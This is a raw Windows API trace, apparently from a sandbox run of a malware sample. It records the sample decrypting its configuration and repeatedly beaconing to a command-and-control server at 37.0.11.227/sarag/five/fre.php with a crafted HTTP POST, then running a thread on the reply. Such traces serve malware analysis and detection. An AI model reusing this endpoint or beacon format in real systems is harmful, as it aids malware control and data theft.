[0310.511] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0310.511] GetProcessHeap () returned 0x690000 [0310.512] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0310.512] GetProcessHeap () returned 0x690000 [0310.512] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0310.514] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0310.514] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0310.518] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0310.518] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0310.523] GetProcessHeap () returned 0x690000 [0310.523] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8a30 [0310.524] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0310.524] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a8a30, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0310.525] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0310.525] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0310.526] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0310.526] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0310.526] GetProcessHeap () returned 0x690000 [0310.527] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8a30 | out: hHeap=0x690000) returned 1 [0310.527] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0310.527] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0310.528] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0310.528] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0310.529] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0310.529] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0310.529] GetProcessHeap () returned 0x690000 [0310.529] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0310.530] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0310.530] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0310.530] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0310.531] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0310.531] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0310.531] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0310.532] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0310.532] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0310.532] GetProcessHeap () returned 0x690000 [0310.532] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f20 [0310.532] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a31f0*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0310.532] GetProcessHeap () returned 0x690000 [0310.532] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab480 [0310.532] socket (af=2, type=1, protocol=6) returned 0xa6c [0310.533] connect (s=0xa6c, name=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0310.560] FreeAddrInfoW (pAddrInfo=0x6a31f0*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0310.560] GetProcessHeap () returned 0x690000 [0310.560] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aecc0 [0310.560] GetProcessHeap () returned 0x690000 [0310.560] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6cd7d8 [0310.560] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0310.561] wvsprintfA (in: param_1=0x6cd7d8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0310.561] GetProcessHeap () returned 0x690000 [0310.561] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6b0340 [0310.561] GetProcessHeap () returned 0x690000 [0310.562] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6cd7d8 | out: hHeap=0x690000) returned 1 [0310.562] GetProcessHeap () returned 0x690000 [0310.562] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a3fe0 [0310.562] GetProcessHeap () returned 0x690000 [0310.562] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6cd7d8 [0310.562] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0310.563] wvsprintfA (in: param_1=0x6cd7d8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0310.563] GetProcessHeap () returned 0x690000 [0310.563] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0310.563] GetProcessHeap () returned 0x690000 [0310.564] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6cd7d8 | out: hHeap=0x690000) returned 1 [0310.564] send (s=0xa6c, buf=0x6ad508*, len=242, flags=0) returned 242 [0310.564] send (s=0xa6c, buf=0x6aba40*, len=159, flags=0) returned 159 [0310.564] GetProcessHeap () returned 0x690000 [0310.564] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0310.564] recv (in: s=0xa6c, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0310.643] GetProcessHeap () returned 0x690000 [0310.644] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0310.644] GetProcessHeap () returned 0x690000 [0310.645] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3fe0 | out: hHeap=0x690000) returned 1 [0310.648] GetProcessHeap () returned 0x690000 [0310.649] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b0340 | out: hHeap=0x690000) returned 1 [0310.649] GetProcessHeap () returned 0x690000 [0310.649] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aecc0 | out: hHeap=0x690000) returned 1 [0310.649] closesocket (s=0xa6c) returned 0 [0310.649] GetProcessHeap () returned 0x690000 [0310.649] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab480 | out: hHeap=0x690000) returned 1 [0310.649] GetProcessHeap () returned 0x690000 [0310.650] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0310.650] GetProcessHeap () returned 0x690000 [0310.651] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0310.651] GetProcessHeap () returned 0x690000 [0310.651] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f20 | out: hHeap=0x690000) returned 1 [0310.651] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1694) returned 0xa6c [0310.653] Sleep (dwMilliseconds=0xea60) [0310.659] GetProcessHeap () returned 0x690000 [0310.659] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4148 [0310.660] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0310.661] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0310.665] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0310.665] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aee58) returned 1 [0310.671] GetProcessHeap () returned 0x690000 [0310.671] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8940 [0310.671] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0310.672] CryptImportKey (in: hProv=0x6aee58, pbData=0x6a8940, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0310.672] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0310.673] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0310.673] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0310.673] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0310.673] GetProcessHeap () returned 0x690000 [0310.674] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8940 | out: hHeap=0x690000) returned 1 [0310.675] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0310.675] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4148, pdwDataLen=0x19fcfc | out: pbData=0x6a4148, pdwDataLen=0x19fcfc) returned 1 [0310.675] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0310.676] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0310.676] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0310.676] CryptReleaseContext (hProv=0x6aee58, dwFlags=0x0) returned 1 [0310.676] GetProcessHeap () returned 0x690000 [0310.676] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0310.677] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0310.677] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0310.678] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0310.678] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0310.679] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0310.679] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0310.679] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0310.680] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0310.680] GetProcessHeap () returned 0x690000 [0310.680] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0310.680] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0310.680] GetProcessHeap () returned 0x690000 [0310.680] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0310.681] GetProcessHeap () returned 0x690000 [0310.681] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0310.681] GetProcessHeap () returned 0x690000 [0310.681] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4148 | out: hHeap=0x690000) returned 1 [0310.681] GetProcessHeap () returned 0x690000 [0310.681] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0310.682] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0310.682] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0310.755] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0310.755] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aedd0) returned 1 [0310.761] GetProcessHeap () returned 0x690000 [0310.761] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a88e0 [0310.761] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0310.762] CryptImportKey (in: hProv=0x6aedd0, pbData=0x6a88e0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0310.762] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0310.762] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0310.763] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0310.763] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0310.763] GetProcessHeap () returned 0x690000 [0310.764] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a88e0 | out: hHeap=0x690000) returned 1 [0310.876] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0310.876] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0310.877] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0310.877] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0310.877] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0310.878] CryptReleaseContext (hProv=0x6aedd0, dwFlags=0x0) returned 1 [0310.878] GetProcessHeap () returned 0x690000 [0310.878] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0310.878] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0310.879] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0310.879] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0310.879] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0310.880] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0310.880] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0310.881] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0310.881] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0310.881] GetProcessHeap () returned 0x690000 [0310.881] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a3088 [0310.892] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0310.892] GetProcessHeap () returned 0x690000 [0310.893] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab4d0 [0310.893] socket (af=2, type=1, protocol=6) returned 0xa70 [0310.893] connect (s=0xa70, name=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0310.919] FreeAddrInfoW (pAddrInfo=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0310.919] GetProcessHeap () returned 0x690000 [0310.919] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aeff0 [0310.919] GetProcessHeap () returned 0x690000 [0310.919] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6cd7d8 [0310.919] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0310.920] wvsprintfA (in: param_1=0x6cd7d8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0310.920] GetProcessHeap () returned 0x690000 [0310.920] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6aff80 [0310.920] GetProcessHeap () returned 0x690000 [0310.921] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6cd7d8 | out: hHeap=0x690000) returned 1 [0310.921] GetProcessHeap () returned 0x690000 [0310.921] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4418 [0310.921] GetProcessHeap () returned 0x690000 [0310.921] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6cd7d8 [0310.921] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0310.922] wvsprintfA (in: param_1=0x6cd7d8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0310.922] GetProcessHeap () returned 0x690000 [0310.922] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0310.922] GetProcessHeap () returned 0x690000 [0310.923] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6cd7d8 | out: hHeap=0x690000) returned 1 [0310.923] send (s=0xa70, buf=0x6ad508*, len=242, flags=0) returned 242 [0310.923] send (s=0xa70, buf=0x6aba40*, len=159, flags=0) returned 159 [0310.923] GetProcessHeap () returned 0x690000 [0310.923] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0310.923] recv (in: s=0xa70, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0311.046] GetProcessHeap () returned 0x690000 [0311.047] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0311.048] GetProcessHeap () returned 0x690000 [0311.048] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4418 | out: hHeap=0x690000) returned 1 [0311.048] GetProcessHeap () returned 0x690000 [0311.049] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aff80 | out: hHeap=0x690000) returned 1 [0311.049] GetProcessHeap () returned 0x690000 [0311.049] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aeff0 | out: hHeap=0x690000) returned 1 [0311.049] closesocket (s=0xa70) returned 0 [0311.050] GetProcessHeap () returned 0x690000 [0311.050] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab4d0 | out: hHeap=0x690000) returned 1 [0311.050] GetProcessHeap () returned 0x690000 [0311.050] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0311.050] GetProcessHeap () returned 0x690000 [0311.051] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0311.051] GetProcessHeap () returned 0x690000 [0311.051] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3088 | out: hHeap=0x690000) returned 1 [0311.051] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x16b0) returned 0xa70 [0311.053] Sleep (dwMilliseconds=0xea60) [0311.054] GetProcessHeap () returned 0x690000 [0311.054] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4148 [0311.055] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0311.055] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0311.061] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0311.062] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0311.071] GetProcessHeap () returned 0x690000 [0311.071] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8820 [0311.071] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0311.072] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a8820, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d628) returned 1 [0311.072] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0311.073] CryptSetKeyParam (hKey=0x69d628, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0311.074] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0311.074] CryptSetKeyParam (hKey=0x69d628, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0311.074] GetProcessHeap () returned 0x690000 [0311.075] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8820 | out: hHeap=0x690000) returned 1 [0311.080] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0311.081] CryptDecrypt (in: hKey=0x69d628, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4148, pdwDataLen=0x19fcfc | out: pbData=0x6a4148, pdwDataLen=0x19fcfc) returned 1 [0311.081] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0311.082] CryptDestroyKey (hKey=0x69d628) returned 1 [0311.082] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0311.082] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0311.082] GetProcessHeap () returned 0x690000 [0311.082] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0311.083] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0311.083] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0311.084] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0311.084] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0311.085] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0311.085] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0311.086] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0311.086] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0311.086] GetProcessHeap () returned 0x690000 [0311.086] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0311.086] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0311.086] GetProcessHeap () returned 0x690000 [0311.087] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0311.087] GetProcessHeap () returned 0x690000 [0311.087] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0311.087] GetProcessHeap () returned 0x690000 [0311.088] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4148 | out: hHeap=0x690000) returned 1 [0311.088] GetProcessHeap () returned 0x690000 [0311.088] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4148 [0311.088] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0311.089] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0311.092] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0311.093] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6af188) returned 1 [0311.097] GetProcessHeap () returned 0x690000 [0311.097] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8a00 [0311.098] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0311.098] CryptImportKey (in: hProv=0x6af188, pbData=0x6a8a00, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 